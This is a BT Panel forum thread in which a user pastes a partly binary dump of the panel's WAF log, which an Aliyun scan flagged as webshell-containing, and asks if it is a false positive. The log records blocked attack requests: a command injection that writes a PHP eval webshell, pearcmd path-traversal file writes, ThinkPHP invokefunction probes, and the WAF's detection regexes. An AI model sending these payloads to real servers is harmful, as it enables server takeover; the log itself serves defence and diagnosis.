宝塔用户_qyujyn 发表于 2024-11-14 04:19:54

【已完成】阿里云发现包含WEBSHELL代码的日志/图片文件,我.

为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:9.2
系统版本:DEBIAN12
问题描述:阿里云发现包含WEBSHELL代码的日志/图片文件
相关截图(日志、错误):
报毒文件:

恶意代码显示

Expand 10 linesExpand 30 linesExpand 100 lines


1184
日本

1185
日本

1186
美国

1187
美国

1188
美国  美国?� ��u��(�fô

1189
u� � T �+!���u�(g3)  !�%o � g2��2024-11-12 14:33:49ip.com199.45.154.148美国-95.71289137.09024GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/4b80ce68bfd8d130082fb98c94440b7a.log�'f3'  !�%o � g2��2024-11-12 12:55:39ip.com206.168.34.41美国-95.71289137.09024GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/4b80ce68bfd8d130082fb98c94440b7a.log�+e3)  #!�%o � g2��2024-11-12 12:55:33ip.com167.94.138.168美国-83.772708842.2733151GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/4b80ce68bfd8d130082fb98c94440b7a.log�&d3+  �%o � g2߹2024-11-12 12:55:21ip.com162.142.125.209美国-87.686241.8373GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/4b80ce68bfd8d130082fb98c94440b7a.log�c3'  !� 9+�� g2Z2024-11-12 03:25:06ip.com64.227.149.86印度77.490855612.95396GET/source/pack/127.0.0.1/download.php?site=1;echo%20%27%3C?php%20eval($_POST%5B%22bushiwo%22%5D);?%3E%27%20%3E%20configsx.php%3Bpython-requests/2.25.1PHP代码执行\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\[ >> site=1;echo '<?php eval($_POST["bushiwo"]);?>' > configsx.php; >> 1;echo '<?php eval($_POST["bushiwo"]);?>' > configsx.php;php/www/server/btwaf/totla_db/http_log/dafaaa7f234105a3e48f08bf3841fe98.log�_b3%  #q9%�E#� g1��2024-11-11 15:43:10ip.com8.216.88.157日本139.453791635.667903GET/index.php?lang=../../../../../../../../tmp/index1Custom-AsyncHttpClient文件包含\.\./+\.\./ >> lang=../../../../../../../../tmp/index1 >> ../../../../../../../../tmp/index1file_import/www/server/btwaf/totla_db/http_log/5db3ab66ff2f3d88efea577c3da705db.log�Da3%  #�}9%�#� g1��2024-11-11 15:43:10ip.com8.216.88.157日本139.453791635.667903GET/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.phpCustom-AsyncHttpClient文件包含\.\./+\.\./ >> lang=../../../../../../../../usr/local/lib/php/pearcmd >> ../../../../../../../../usr/local/lib/php/pearcmdfile_import/www/server/btwaf/totla_db/http_log/fcbe540091ce535b5d8188adf1ae44d5.log�!`3%  #�i9%�]� g1��2024-11-11 15:43:09ip.com8.216.88.157日本139.453791635.667903GET/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars=md5&vars[]=HelloCustom-AsyncHttpClient通用漏洞(invokefunction|call_user_func_array|\\think\\) >> function=call_user_func_array >> call_user_func_arraynday/www/server/btwaf/totla_db/http_log/040b995af122cb2b0083eae6b022a49e.log�_3%  #�� g1��2024-11-11 15:43:09ip.com8.216.88.157日本139.453791635.667903GET/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars=md5&vars[]=HelloCustom-AsyncHttpClient通用漏洞(invokefunction|call_user_func_array|\\think\\) >> function=call_user_func_array >> call_user_func_arraynday/www/server/btwaf/totla_db/http_log/ba29f85da82a0abbeb9928ba76769736.log�h^3' !q9%�E#� g1u32024-11-11 11:08:35ip.com36.139.63.123深圳中国广东114.08594722.547GET/index.php?lang=../../../../../../../../tmp/index1Custom-AsyncHttpClient文件包含\.\./+\.\./ >> lang=../../../../../../../../tmp/index1 >> ../../../../../../../../tmp/index1file_import/www/server/btwaf/totla_db/http_log/5db3ab66ff2f3d88efea577c3da705db.log?� ��u�F]��,vSQLite format 3@ !.c 2 � � D � � A � � M ��)��2T##qindexis_statu_ipblocking_ipCREATE INDEX is_statu_ip ON blocking_ip(is_status)A#Windexip_ipblocking_ipCREATE INDEX ip_ip ON blocking_ip(ip)\)#{indexserver_name_ipblocking_ipCREATE INDEX server_name_ip ON blocking_ip(server_name)f/#�indextime_localtime_ipblocking_ipCREATE INDEX time_localtime_ip ON blocking_ip(time_localtime)G #_indextime_ipblocking_ipCREATE INDEX time_ip ON blocking_ip(time)A #Windexid_ipblocking_ip CREATE INDEX id_ip ON blocking_ip(id)�- ##�!tableblocking_ipblocking_ip CREATE TABLE blocking_ip (

1190
id INTEGER PRIMARY KEY AUTOINCREMENT,

1191
time INTEGER,

1192
time_localtime TEXT,

1193
server_name TEXT,

1194
ip TEXT,


Expand 10 linesExpand 30 linesExpand 100 lines


6083
'��%w3%/ % �%o � g3��2024-11-13 01:13:29yun.520fk.cn2602:80d:1005::12未知位置GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/6df7d79d873daaa69a1085d52004022f.log�(v3)  !�%o � g3{�2024-11-13 00:01:54ip.com206.168.34.213美国-95.71289137.09024GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/4b80ce68bfd8d130082fb98c94440b7a.log�(u3)  !�%o � g3{�2024-11-13 00:01:50ip.com206.168.34.122美国-95.71289137.09024GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/4b80ce68bfd8d130082fb98c94440b7a.log�(t3)  !�%o � g3{�2024-11-13 00:01:41ip.com206.168.34.120美国-95.71289137.09024GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/4b80ce68bfd8d130082fb98c94440b7a.log�'s3'  !�%o � g3{�2024-11-13 00:01:28ip.com206.168.34.39美国-95.71289137.09024GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/4b80ce68bfd8d130082fb98c94440b7a.log�+r3)  #!�%o � g3{�2024-11-13 00:01:23ip.com167.94.138.115美国-83.772708842.2733151GET/Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)恶意爬虫UA存在问题已经被系统拦截。并封锁IP/www/server/btwaf/totla_db/http_log/4b80ce68bfd8d130082fb98c94440b7a.log



宝塔用户_qyujyn 发表于 2024-11-14 04:20:47

看起来是WAF的报毒,我有购买专业版的WAF,请问这是误报吗

堡塔运维南一 发表于 2024-12-6 16:13:20

您好,这个问题如果没有解决的话,请重新发帖哈,这篇帖子就关闭了
页: [1]
查看完整版本: 【已完成】阿里云发现包含WEBSHELL代码的日志/图片文件,我.